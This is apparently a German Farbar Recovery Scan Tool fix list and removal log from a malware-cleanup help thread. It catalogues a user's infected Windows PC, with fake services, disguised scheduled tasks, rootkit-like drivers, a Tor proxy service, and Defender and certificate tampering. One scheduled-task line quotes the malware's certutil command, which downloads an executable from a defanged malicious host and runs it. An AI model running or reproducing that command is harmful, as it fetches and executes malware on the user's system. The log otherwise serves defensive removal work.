R2 TCPSvc; "C:\Users\Nico\AppData\Local\Temp\csrss\proxy\tor.exe" --nt-service -f "C:\Users\Nico\AppData\Local\Temp\csrss\proxy\config" --Log "notice file C:\Users\Nico\AppData\Local\Temp\csrss\proxy\t" <==== ACHTUNG
C:\Users\Nico\AppData\Local\Temp\csrss
S2 WNetworkMgmt; "C:\ProgramData\Microsoft\Windows\WNetworkMgmt\WNetworkMgmt.exe"  [X]
C:\ProgramData\Microsoft\Windows\WNetworkMgmt
S3 FairplayKD; \??\C:\ProgramData\MTA San Andreas All\Common\temp\FairplayKD.sys [X]
S3 Synth3dVsc; System32\drivers\synth3dvsc.sys [X]
S3 tsusbhub; system32\drivers\tsusbhub.sys [X]
S3 VGPU; System32\drivers\rdvgkmd.sys [X]
R3 Winmon; C:\Windows\System32\drivers\Winmon.sys [0 ] () <==== ACHTUNG (Null Byte Datei/Ordner)
R3 WinmonFS; C:\Windows\System32\drivers\WinmonFS.sys [0 ] (Windows (R) Win 7 DDK provider) <==== ACHTUNG (Null Byte Datei/Ordner)
R1 WinmonProcessMonitor; C:\Windows\System32\drivers\WinmonProcessMonitor.sys [36096 2018-05-27] () [Datei ist nicht signiert]
C:\Windows\System32\drivers\WinmonProcessMonitor.sys
C:\Windows\System32\drivers\WinmonFS.sys
C:\Windows\System32\drivers\Winmon.sys
2018-05-28 14:53 - 2018-05-28 14:53 - 000003824 _____ C:\Windows\System32\Tasks\MainPMgr
2018-05-28 14:53 - 2018-05-28 14:53 - 000003786 _____ C:\Windows\System32\Tasks\SystemUpdate64
2018-05-28 14:53 - 2018-05-28 14:53 - 000000000 ____D C:\Program Files\SystemaRev
2018-05-28 14:38 - 2018-05-28 14:42 - 000189686 _____ C:\Windows\ntbtlog.txt
2018-05-27 15:09 - 2018-05-27 15:09 - 000000000 ____D C:\ProgramData\SystemaRev
2018-05-27 14:57 - 2018-05-27 14:57 - 000004270 _____ C:\Windows\System32\Tasks\ReimageUpdater
2018-05-27 14:56 - 2018-05-28 14:40 - 000000150 _____ C:\Windows\Reimage.ini
2018-05-27 14:50 - 2018-05-27 14:50 - 000000000 ____D C:\Users\Nico\AppData\Roaming\ParetoLogic
2018-05-27 10:47 - 2018-05-27 11:15 - 000000000 ____D C:\Windows\SysWOW64\SSL
2018-05-27 10:47 - 2018-05-27 11:12 - 000929792 _____ C:\Users\Nico\AppData\Local\sham.db
2018-05-27 10:47 - 2018-05-27 10:53 - 000016080 _____ C:\Users\Nico\AppData\Local\InstallationConfiguration.xml
2018-05-27 10:47 - 2018-05-27 10:47 - 007611392 _____ C:\Users\Nico\AppData\Local\agent.dat
2018-05-27 10:47 - 2018-05-27 10:47 - 002136576 _____ (TODO: <Company name>) C:\Users\Nico\AppData\Local\Hottam.exe
2018-05-27 10:47 - 2018-05-27 10:47 - 001987748 _____ C:\Users\Nico\AppData\Local\Hottam.tst
2018-05-27 10:47 - 2018-05-27 10:47 - 001895382 _____ C:\Users\Nico\AppData\Local\Jaytip.bin
2018-05-27 10:47 - 2018-05-27 10:47 - 001620480 _____ C:\Windows\qcusolizqbhuglpw.qcus
2018-05-27 10:47 - 2018-05-27 10:47 - 000278510 _____ C:\Users\Nico\AppData\Local\VoltFinlab.bin
2018-05-27 10:47 - 2018-05-27 10:47 - 000140800 _____ C:\Users\Nico\AppData\Local\installer.dat
2018-05-27 10:47 - 2018-05-27 10:47 - 000126464 _____ C:\Users\Nico\AppData\Local\noah.dat
2018-05-27 10:47 - 2018-05-27 10:47 - 000070896 _____ C:\Users\Nico\AppData\Local\Config.xml
2018-05-27 10:47 - 2018-05-27 10:47 - 000018432 _____ C:\Users\Nico\AppData\Local\Main.dat
2018-05-27 10:47 - 2018-05-27 10:47 - 000015610 _____ C:\Windows\SysWOW64\findit.xml
2018-05-27 10:47 - 2018-05-27 10:47 - 000005568 _____ C:\Users\Nico\AppData\Local\md.xml
2018-05-27 10:47 - 2018-05-27 10:47 - 000000000 ____D C:\ProgramData\Logic Cramble
2018-05-27 09:58 - 2018-05-27 09:58 - 000000306 __RSH C:\Users\Nico\ntuser.pol
2018-05-27 09:58 - 2018-05-27 09:58 - 000000000 ____D C:\Users\Nico\AppData\Roaming\FastDataX
2018-05-27 09:57 - 2018-05-27 09:57 - 000000000 ____D C:\Users\Nico\AppData\Local\XService
2018-05-27 09:57 - 2018-05-27 09:57 - 000000000 ____D C:\Users\Nico\AppData\Local\Package Cache
2018-05-27 09:49 - 2018-05-27 09:49 - 000000000 ____D C:\Users\Nico\AppData\Roaming\EpicNet Inc
2018-05-27 09:48 - 2018-05-28 14:44 - 000003502 _____ C:\Windows\System32\Tasks\ScheduledUpdate
2018-05-27 09:48 - 2018-05-28 14:44 - 000003172 _____ C:\Windows\System32\Tasks\csrss
2018-05-27 09:48 - 2018-05-27 09:48 - 000036096 _____ C:\Windows\system32\Drivers\WinmonProcessMonitor.sys
2018-05-27 09:48 - 2018-05-27 09:48 - 000004180 _____ C:\Windows\System32\Tasks\AncillaryFunctionauf
2018-05-27 09:48 - 2018-05-27 09:48 - 000000000 ____D C:\Users\Nico\AppData\Local\betterworld
2018-05-27 09:48 - 2018-03-24 14:51 - 002990080 _____ C:\Windows\system32\mcicda64.dll
2018-05-27 09:47 - 2018-05-28 16:07 - 000003702 _____ C:\Windows\System32\Tasks\WindowsRecoveryCleaner
2018-05-27 09:47 - 2018-05-28 14:44 - 000000034 _____ C:\Users\Public\Documents\{DE764086-1C0A-4DD3-90BA-0B93BDD794BE}
2018-05-27 09:47 - 2018-05-27 11:41 - 000003082 __RSH C:\ProgramData\ntuser.pol
2018-05-27 09:47 - 2018-05-27 10:22 - 000016718 _____ C:\Windows\System32\Tasks\Social Software
2018-05-27 09:47 - 2018-05-27 09:47 - 002032128 ___SH (Apple Inc.) C:\ProgramData\Iostream.exe
2018-05-27 09:47 - 2018-05-27 09:47 - 000043520 _____ C:\Users\Nico\AppData\Local\pfialx.dll
2018-05-27 09:47 - 2018-05-27 09:47 - 000004480 _____ C:\Windows\System32\Tasks\GoogleUpdateSecurityTaskMachine_OT
2018-05-27 09:47 - 2018-05-27 09:47 - 000004480 _____ C:\Windows\System32\Tasks\GoogleUpdateSecurityTaskMachine_FG
2018-05-27 09:47 - 2018-05-27 09:47 - 000004480 _____ C:\Windows\System32\Tasks\GoogleUpdateSecurityTaskMachine_AM
2018-05-27 09:47 - 2018-05-27 09:47 - 000004468 _____ C:\Windows\System32\Tasks\GoogleUpdateSecurityTaskMachine_VJ
2018-05-27 09:47 - 2018-05-27 09:47 - 000004444 _____ C:\Windows\System32\Tasks\GoogleUpdateSecurityTaskMachine_NM
2018-05-27 09:47 - 2018-05-27 09:47 - 000000000 ____D C:\Users\Public\Documents\XMUpdate
2018-05-27 09:47 - 2018-05-27 09:47 - 000000000 ____D C:\Program Files\Common Files\5ZNAWZD2EL69
2018-05-27 08:56 - 2018-05-27 08:56 - 000001285 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HowToRemove.lnk
2018-05-27 08:56 - 2018-05-27 08:56 - 000000000 ____D C:\Users\Nico\AppData\LocalLow\AMD
2018-05-26 14:03 - 2018-05-26 14:03 - 001592320 _____ C:\Windows\2045f4764aa9c27a5e23cd56fa5420a8.exe
2018-05-26 14:03 - 2018-05-26 14:03 - 000039584 _____ C:\Windows\uninstaller.dat
2018-05-25 12:23 - 2018-05-25 12:23 - 000000000 ___HD C:\Windows\msdownld.tmp
2018-05-27 09:47 - 2018-05-27 09:47 - 002032128 ___SH (Apple Inc.) C:\ProgramData\Iostream.exe
2018-05-25 01:01 - 2018-05-25 01:01 - 000000184 ____H () C:\Program Files (x86)\Common Files\new.bat
2018-05-27 10:47 - 2018-05-27 10:47 - 007611392 _____ () C:\Users\Nico\AppData\Local\agent.dat
2018-05-27 10:47 - 2018-05-27 10:47 - 000070896 _____ () C:\Users\Nico\AppData\Local\Config.xml
2018-05-27 10:47 - 2018-05-27 10:47 - 002136576 _____ (TODO: <Company name>) C:\Users\Nico\AppData\Local\Hottam.exe
2018-05-27 10:47 - 2018-05-27 10:47 - 001987748 _____ () C:\Users\Nico\AppData\Local\Hottam.tst
2018-05-27 10:47 - 2018-05-27 10:53 - 000016080 _____ () C:\Users\Nico\AppData\Local\InstallationConfiguration.xml
2018-05-27 10:47 - 2018-05-27 10:47 - 000140800 _____ () C:\Users\Nico\AppData\Local\installer.dat
2018-05-27 10:47 - 2018-05-27 10:47 - 001895382 _____ () C:\Users\Nico\AppData\Local\Jaytip.bin
2018-05-27 10:47 - 2018-05-27 10:47 - 000018432 _____ () C:\Users\Nico\AppData\Local\Main.dat
2018-05-27 10:47 - 2018-05-27 10:47 - 000005568 _____ () C:\Users\Nico\AppData\Local\md.xml
2018-05-27 10:47 - 2018-05-27 10:47 - 000126464 _____ () C:\Users\Nico\AppData\Local\noah.dat
2018-05-27 09:47 - 2018-05-27 09:47 - 000043520 _____ () C:\Users\Nico\AppData\Local\pfialx.dll
2018-02-05 20:57 - 2018-05-27 13:14 - 000007654 _____ () C:\Users\Nico\AppData\Local\Resmon.ResmonCfg
2018-05-27 10:47 - 2018-05-27 11:12 - 000929792 _____ () C:\Users\Nico\AppData\Local\sham.db
2018-05-27 10:47 - 2018-05-27 10:47 - 000032038 _____ () C:\Users\Nico\AppData\Local\uninstall_temp.ico
2018-05-27 10:47 - 2018-05-27 10:47 - 000278510 _____ () C:\Users\Nico\AppData\Local\VoltFinlab.bin
ShellIconOverlayIdentifiers: [{BFD98515-CD74-48A4-98E2-13D209E3EE4F}] -> {BFD98515-CD74-48A4-98E2-13D209E3EE4F} => C:\Windows\system32\mcicda64.dll [2018-03-24] ()
C:\Windows\system32\mcicda64.dll
Task: {099A856C-08D3-43C8-AD18-3D651763C816} - System32\Tasks\Social Software => C:\Windows\system32\rundll32.exe "C:\Program Files\Social Software\Social Software.dll",UjaAssDjw <==== ACHTUNG
C:\Program Files\Social Software
Task: {1622AF7B-53DD-4FEE-8BE9-907C9F57AA98} - System32\Tasks\SystemUpdate64 => C:\Program Files\SystemaRev\RevServicesX\SystemUpdate64.exe [2018-05-27] (SystemaRev)
C:\Program Files\SystemaRev
Task: {1913E8F8-F8A7-47F0-A2D5-DF77C0226E3E} - System32\Tasks\GoogleUpdateSecurityTaskMachine_FG => C:\Users\Nico\AppData\Local\Temp\36dd72f0d5c24801a35656466bd03b9d\HandlerExecution.exe <==== ACHTUNG
C:\Users\Nico\AppData\Local\Temp\36dd72f0d5c24801a35656466bd03b9d
Task: {28FB99D2-B4C3-4FD4-8949-3C860CE2DE24} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe [2018-05-27] () <==== ACHTUNG
Task: {412B9FDA-8C4C-40F4-A23C-696805866F9C} - System32\Tasks\AncillaryFunctionauf => C:\Program Files (x86)\nodejs\node.exe
C:\Program Files (x86)\nodejs
Task: {42767FB3-1423-4F1B-8F31-8B5936FA8F06} - System32\Tasks\GoogleUpdateSecurityTaskMachine_VJ => C:\Users\Nico\AppData\Roaming\a4d85c2ba162448f9d08d690843ffb22\HandlerExecution.exe <==== ACHTUNG
C:\Users\Nico\AppData\Roaming\a4d85c2ba162448f9d08d690843ffb22
Task: {478261E4-F178-4CD8-8575-B8ACE5A0769E} - System32\Tasks\GoogleUpdateSecurityTaskMachine_AM => C:\Users\Nico\AppData\Local\Temp\be1f0849f130446da031e35271bfb3f7\HandlerExecution.exe <==== ACHTUNG
C:\Users\Nico\AppData\Local\Temp\be1f0849f130446da031e35271bfb3f7
Task: {6372E416-89E4-46ED-A9C3-6F1F6F797A15} - System32\Tasks\GoogleUpdateSecurityTaskMachine_NM => C:\Users\Nico\AppData\Roaming\6c3a24720f8d4be29080877f498e5aa9\HandlerExecution.exe <==== ACHTUNG
C:\Users\Nico\AppData\Roaming\6c3a24720f8d4be29080877f498e5aa9
Task: {66E7FCFF-AEE1-4593-AF28-7B81A60E82D7} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://dp.fastandcoolest.com/app/4/app.exe C:\Users\Nico\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Nico\AppData\Local\Temp\csrss\scheduled.exe /31340 <==== ACHTUNG
Task: {6E7DD5F8-0819-4296-8B92-EEA20358E2F3} - System32\Tasks\MainPMgr => powershell -ExecutionPolicy ByPass -File pm.ps1
Task: {AB4D74FB-B89A-4A74-982B-76AE532F4F7F} - System32\Tasks\GoogleUpdateSecurityTaskMachine_OT => C:\Users\Nico\AppData\Local\Temp\f4e669f936dd4a41b8d1678962b0fc78\HandlerExecution.exe <==== ACHTUNG
C:\Users\Nico\AppData\Local\Temp\f4e669f936dd4a41b8d1678962b0fc78
Task: {BAD80BEE-7129-4A3C-B9FA-580ED44A6159} - System32\Tasks\ReimageUpdater => C:\Program Files\Reimage\Reimage Protector\ReiGuard.exe <==== ACHTUNG
C:\Program Files\Reimage
Task: {C6FD6CF5-A7E5-4DC3-A8A0-17D3A10CD175} - System32\Tasks\WindowsRecoveryCleaner => C:\ProgramData\Iostream.exe [2018-05-27] (Apple Inc.) <==== ACHTUNG
C:\ProgramData\Iostream.exe
ShortcutWithArgument: C:\Users\Nico\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> %SNP%
AlternateDataStreams: C:\ProgramData:NT [40]
AlternateDataStreams: C:\ProgramData:NT2 [552]
AlternateDataStreams: C:\Users\All Users:NT [40]
AlternateDataStreams: C:\Users\All Users:NT2 [552]
AlternateDataStreams: C:\ProgramData\Anwendungsdaten:NT [40]
AlternateDataStreams: C:\ProgramData\Anwendungsdaten:NT2 [552]
AlternateDataStreams: C:\ProgramData\Application Data:NT [40]
AlternateDataStreams: C:\ProgramData\Application Data:NT2 [552]
AlternateDataStreams: C:\ProgramData\MTA San Andreas All:NT [40]
AlternateDataStreams: C:\ProgramData\MTA San Andreas All:NT2 [552]
AlternateDataStreams: C:\Users\Nico\Anwendungsdaten:NT [40]
AlternateDataStreams: C:\Users\Nico\Anwendungsdaten:NT2 [552]
AlternateDataStreams: C:\Users\Nico\AppData\Roaming:NT [40]
AlternateDataStreams: C:\Users\Nico\AppData\Roaming:NT2 [552]
AlternateDataStreams: C:\Users\Public\AppData:CSM [472]
Unlock: C:\Windows\system32\Drivers\etc\hosts
C:\Windows\system32\Drivers\etc\hosts
Hosts:
VirusTotal: C:\Windows\system32\ntkrnlmp.exe
VirusTotal: C:\Windows\system32\osloader.exe
VirusTotal: C:\ProgramData\Microsoft\Windows\Audio\winamgr.exe
Folder: C:\Windows\rss
ExportKey: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions
RemoveProxy:
CMD: ipconfig /flushdns
CMD: netsh winsock reset
EmptyTemp:

*****************

Prozesse erfolgreich geschlossen.
"HKLM\Software\Microsoft\Windows\CurrentVersion\Run\\resolve_run" => erfolgreich entfernt
C:\Program Files (x86)\Common Files\new.bat => erfolgreich verschoben
"HKLM\Software\Microsoft\Windows\CurrentVersion\policies\Explorer\Run\\Chrome Update Helper" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\03D22C9C66915D58C88912B64C1F984B8344EF09" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\0F684EC1163281085C6AF20528878103ACEFCAAB" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\1667908C9E22EFBD0590E088715CC74BE4C60884" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\18DEA4EFA93B06AE997D234411F3FD72A677EECE" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\2026D13756EB0DB753DF26CB3B7EEBE3E70BB2CF" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\249BDA38A611CD746A132FA2AF995A2D3C941264" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\31AC96A6C17C425222C46D55C3CCA6BA12E54DAF" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\331E2046A1CCA7BFEF766724394BE6112B4CA3F7" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\3353EA609334A9F23A701B9159E30CB6C22D4C59" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\373C33726722D3A5D1EDD1F1585D5D25B39BEA1A" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\3850EDD77CC74EC9F4829AE406BBF9C21E0DA87F" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\3D496FA682E65FC122351EC29B55AB94F3BB03FC" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\4243A03DB4C3C15149CEA8B38EEA1DA4F26BD159" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\42727E052C0C2E1B35AB53E1005FD9EDC9DE8F01" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\4420C99742DF11DD0795BC15B7B0ABF090DC84DF" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\4C0AF5719009B7C9D85C5EAEDFA3B7F090FE5FFF" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\5240AB5B05D11B37900AC7712A3C6AE42F377C8C" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\5DD3D41810F28B2A13E9A004E6412061E28FA48D" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\7457A3793086DBB58B3858D6476889E3311E550E" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\76A9295EF4343E12DFC5FE05DC57227C1AB00D29" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\775B373B33B9D15B58BC02B184704332B97C3CAF" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\872CD334B7E7B3C3D1C6114CD6B221026D505EAB" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\88AD5DFE24126872B33175D1778687B642323ACF" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\9132E8B079D080E01D52631690BE18EBC2347C1E" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\982D98951CF3C0CA2A02814D474A976CBFF6BDB1" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\9A08641F7C5F2CCA0888388BE3E5DBDDAAA3B361" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\9C43F665E690AB4D486D4717B456C5554D4BCEB5" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\9E3F95577B37C74CA2F70C1E1859E798B7FC6B13" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\A1F8DCB086E461E2ABB4B46ADCFA0B48C58B6E99" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\A5341949ABE1407DD7BF7DFE75460D9608FBC309" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\A59CC32724DD07A6FC33F7806945481A2D13CA2F" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\AB7E760DA2485EA9EF5A6EEE7647748D4BA6B947" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\AD4C5429E10F4FF6C01840C20ABA344D7401209F" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\AD96BB64BA36379D2E354660780C2067B81DA2E0" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\B8EBF0E696AF77F51C96DB4D044586E2F4F8FD84" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\CDC37C22FE9272D8F2610206AD397A45040326B8" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\D3F78D747E7C5D6D3AE8ABFDDA7522BFB4CBD598" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\DB303C9B61282DE525DC754A535CA2D6A9BD3D87" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\DB77E5CFEC34459146748B667C97B185619251BA" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\E22240E837B52E691C71DF248F12D27F96441C00" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\E513EAB8610CFFD7C87E00BCA15C23AAB407FCEF" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\ED841A61C0F76025598421BC1B00E24189E68D54" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\F83099622B4A9F72CB5081F742164AD1B8D048C9" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\FBB42F089AF2D570F2BF6F493D107A3255A9BB1A" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\FFFA650F2CB2ABC0D80527B524DD3F9FC172C138" => erfolgreich entfernt
"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" => erfolgreich entfernt
"HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\Software\Microsoft\Windows\CurrentVersion\Run\\muV82mBJud.exe" => erfolgreich entfernt
C:\Program Files\Gemeinsame Dateien\5ZNAWZD2EL69 => erfolgreich verschoben
"HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\Software\Microsoft\Windows\CurrentVersion\Run\\PLRFCKFE44692QO" => erfolgreich entfernt
"C:\Program Files\RDH9TH3UTU" => nicht gefunden
"HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\Software\Microsoft\Windows\CurrentVersion\Run\\2196509" => erfolgreich entfernt
"C:\Users\Nico\AppData\Roaming\okdd3kogot1" => nicht gefunden
"HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\Software\Microsoft\Windows\CurrentVersion\Run\\A4UX3F695ZAIC7C" => erfolgreich entfernt
"C:\Program Files (x86)\eu0vb4pykb5" => nicht gefunden
"HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\Software\Microsoft\Windows\CurrentVersion\Run\\flosdx" => erfolgreich entfernt
C:\Users\Nico\AppData\Local\pfialx.dll => erfolgreich verschoben
"HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\Software\Microsoft\Windows\CurrentVersion\Run\\KDY06ILDW1UEHVJ" => erfolgreich entfernt
"C:\Program Files\I88TDHYW3R" => nicht gefunden
"HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\Software\Microsoft\Windows\CurrentVersion\Run\\PatientSunset" => erfolgreich entfernt
C:\Windows\rss\csrss.exe => erfolgreich verschoben
"HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\Software\Microsoft\Windows\CurrentVersion\Run\\QIJFFKRURZ.exe" => erfolgreich entfernt
"C:\Users\Nico\AppData\Roaming\a4d85c2ba162448f9d08d690843ffb22" => nicht gefunden
"HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\Software\Microsoft\Windows\CurrentVersion\Run\\CloudNet" => erfolgreich entfernt
C:\Users\Nico\AppData\Roaming\EpicNet Inc => erfolgreich verschoben
"HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{21cfe5ef-f3b0-11e7-bf9c-10c37b6f5940}" => erfolgreich entfernt
HKLM\Software\Classes\CLSID\{21cfe5ef-f3b0-11e7-bf9c-10c37b6f5940} => nicht gefunden
"HKLM\Software\Microsoft\Windows\CurrentVersion\explorer\ShellExecuteHooks\\{BFD98515-CD74-48A4-98E2-13D209E3EE4F}" => erfolgreich entfernt
"HKLM\Software\Classes\CLSID\{BFD98515-CD74-48A4-98E2-13D209E3EE4F}" => erfolgreich entfernt
C:\Windows\system32\GroupPolicy\Machine => erfolgreich verschoben
C:\Windows\system32\GroupPolicy\GPT.ini => erfolgreich verschoben
"HKLM\SOFTWARE\Policies\Google" => erfolgreich entfernt
HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\Software\Microsoft\Internet Explorer\Main\\Search Page => Wert erfolgreich wiederhergestellt
HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\Software\Microsoft\Internet Explorer\Main\\Start Page => Wert erfolgreich wiederhergestellt
HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => Wert erfolgreich wiederhergestellt
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\ielnksrch" => erfolgreich entfernt
HKLM\Software\Wow6432Node\Classes\CLSID\ielnksrch => nicht gefunden
"HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope" => erfolgreich entfernt
"HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{2f23ab71-4ac6-41f2-a955-ea576e553146}" => erfolgreich entfernt
HKLM\Software\Classes\CLSID\{2f23ab71-4ac6-41f2-a955-ea576e553146} => nicht gefunden
"HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{ielnksrch}" => erfolgreich entfernt
HKLM\Software\Classes\CLSID\{ielnksrch} => nicht gefunden
"HKLM\Software\Mozilla\Firefox\Extensions\\{2DE791A8-8C99-44DF-9976-CEACCA8FE024}" => erfolgreich entfernt
C:\Windows\Installer\{F1DE73B6-EC12-467B-9EA0-FEBA88CC9182} => erfolgreich verschoben
"C:\Windows\Installer\{F1DE73B6-EC12-467B-9EA0-FEBA88CC9182}\{2DE791A8-8C99-44DF-9976-CEACCA8FE024}.xpi" => nicht gefunden
"HKLM\Software\Wow6432Node\Mozilla\Firefox\Extensions\\{2DE791A8-8C99-44DF-9976-CEACCA8FE024}" => erfolgreich entfernt
C:\Program Files\mozilla firefox\defaults\pref\secure_cert.js => erfolgreich verschoben
"HKLM\System\CurrentControlSet\Services\backlh" => erfolgreich entfernt
backlh => Dienst erfolgreich entfernt
C:\ProgramData\Logic Cramble => erfolgreich verschoben
"HKLM\System\CurrentControlSet\Services\MicroService" => erfolgreich entfernt
MicroService => Dienst erfolgreich entfernt
C:\Users\Nico\AppData\Local\XService => erfolgreich verschoben
"HKLM\System\CurrentControlSet\Services\SystemUpdate64" => erfolgreich entfernt
SystemUpdate64 => Dienst erfolgreich entfernt
C:\Program Files\SystemaRev => erfolgreich verschoben
"HKLM\System\CurrentControlSet\Services\winamgr" => erfolgreich entfernt
winamgr => Dienst erfolgreich entfernt
WinDefender => Dienst konnte nicht gestoppt werden.
"HKLM\System\CurrentControlSet\Services\WinDefender" => erfolgreich entfernt
WinDefender => Dienst erfolgreich entfernt
"C:\Windows\windefender.exe" => wurde entsperrt
Konnte nicht verschoben werden "C:\Windows\windefender.exe" => ist geplant bei Neustart verschoben zu werden.
848d0b10145f615d9a5315f9c7921103 => Dienst erfolgreich gestoppt.
"HKLM\System\CurrentControlSet\Services\848d0b10145f615d9a5315f9c7921103" => erfolgreich entfernt
848d0b10145f615d9a5315f9c7921103 => Dienst erfolgreich entfernt
C:\Windows\qcusolizqbhuglpw.qcus => erfolgreich verschoben
"HKLM\System\CurrentControlSet\Services\aspnet_state" => erfolgreich entfernt
aspnet_state => Dienst erfolgreich entfernt
"HKLM\System\CurrentControlSet\Services\EasyAntiCheat" => erfolgreich entfernt
EasyAntiCheat => Dienst erfolgreich entfernt
"HKLM\System\CurrentControlSet\Services\Nettrans" => erfolgreich entfernt
Nettrans => Dienst erfolgreich entfernt
"C:\ProgramData\PrefsSecure" => nicht gefunden
"HKLM\System\CurrentControlSet\Services\pgt_svc" => erfolgreich entfernt
pgt_svc => Dienst erfolgreich entfernt
"C:\Program Files (x86)\ProxyGate" => nicht gefunden
TCPSvc => Dienst konnte nicht gestoppt werden.
"HKLM\System\CurrentControlSet\Services\TCPSvc" => erfolgreich entfernt

Ergebnis der geplanten Datei-Verschiebungen (Start-Modus: Normal) (Datum&Uhrzeit: 31-05-2018 16:12:06)

==> ACHTUNG: Das System wurde nicht neu gestartet.
C:\Windows\windefender.exe => ist erfolgreich verschoben

==== Ende vom Fixlog 16:12:07 ====
Addition:

Code:
Entfernungsergebnis von Farbar Recovery Scan Tool (x64) Version: 16.05.2018 01
durchgeführt von Nico (31-05-2018 14:13:17) Run:1
Gestartet von C:\Users\Nico\Downloads
Geladene Profile: Nico (Verfügbare Profile: Nico)
Start-Modus: Normal
==============================================

fixlist Inhalt:
*****************
CloseProcesses:
HKLM\...\Run: [resolve_run] => C:\Program Files (x86)\Common Files\new.bat [184 2018-05-25] ()
C:\Program Files (x86)\Common Files\new.bat
HKLM\...\Policies\Explorer\Run: [Chrome Update Helper] => C:\Users\Nico\AppData\Local\Temp\dx10r.exe
HKLM\ DisallowedCertificates: 03D22C9C66915D58C88912B64C1F984B8344EF09 (Comodo Security Solutions) <==== ACHTUNG
